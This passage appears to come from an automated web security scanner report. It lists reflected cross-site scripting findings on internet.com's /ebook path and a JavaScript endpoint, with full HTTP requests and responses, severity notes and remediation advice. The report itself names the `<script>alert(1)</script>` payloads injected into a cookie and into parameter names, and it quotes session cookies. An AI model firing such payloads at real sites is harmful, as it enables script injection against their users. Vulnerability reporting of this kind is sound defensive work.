Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=EnEadSGx2lPF70132"-alert(1)-"47d14743a97

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 2869
Date: Fri, 18 Feb 2011 03:24:02 GMT
Connection: close

var ps581Wsid = "EnEadSGx2lPF70132"-alert(1)-"47d14743a97";
// safe-monitor@gecko.js

var ps581Wiso;
try {
   ps581Wiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.ps581Wwid != null);
} catch(e) {
   ps581Wiso = false;
}
if (ps581Wiso) {
...[SNIP]...

3.142. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internet.com
Path:   /ebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b998f</script><script>alert(1)</script>ad4b92d09c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 301 http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1
Server: Apache-Coyote/1.1
Location: http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1
Set-Cookie: CFID=37152; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:00 GMT; Path=/
Set-Cookie: CFTOKEN=49539B8F-F781-4E62-90E20742BCEE58F5; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:00 GMT; Path=/
Set-Cookie: ORIGREFERER=; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:00 GMT
Connection: close


<html>
<head>
<meta http-equiv="Refresh" content="0,http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1">
</head>
<body>
<script language="javascript">
window.location.replace("http://www.devx.com/ebook?b998f</script><script>alert(1)</script>ad4b92d09c2=1");
</script>
...[SNIP]...

3.143. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internet.com
Path:   /ebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60338"><script>alert(1)</script>86ce1a3ea2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 301 http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1
Server: Apache-Coyote/1.1
Location: http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1
Set-Cookie: CFID=37054; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:57:59 GMT; Path=/
Set-Cookie: CFTOKEN=F0F2D3FB-0748-4491-87EF945DB496BB52; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:57:59 GMT; Path=/
Set-Cookie: ORIGREFERER=; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:57:59 GMT
Connection: close


<html>
<head>
<meta http-equiv="Refresh" content="0,http://www.devx.com/ebook?60338"><script>alert(1)</script>86ce1a3ea2b=1">
</head>
<body>
<script language="javascript">
window.location.replace(
...[SNIP]...
